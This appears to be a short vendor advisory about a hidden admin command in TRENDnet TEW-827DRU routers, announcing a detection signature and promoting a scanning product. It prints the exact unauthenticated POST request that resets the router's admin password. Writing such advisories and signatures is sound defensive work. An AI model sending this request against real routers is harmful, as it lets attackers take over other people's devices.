Application Details
TRENDnet’s AC2600 MU-MIMO WiFi Router, model TEW-827DRU, is built to perform in a busy connected home. This dual-band router generates two quad-stream WiFi networks—a 1,733Mbps WiFi AC and a concurrent 800Mbps WiFi N network.
Vulnerability
TRENDnet AC2600 TEW-827DRU routers could allow a remote attacker to bypass security restrictions, caused by the containment of a hidden administrative command.
Identification
By sending a specially crafted request, an attacker could exploit this vulnerability to force the change of the admin password.
POST /apply_sec.cgi
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123Detection
By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to force the change of the admin password.
Coverage
Idappcom has created signature 8022354 along with a corresponding traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional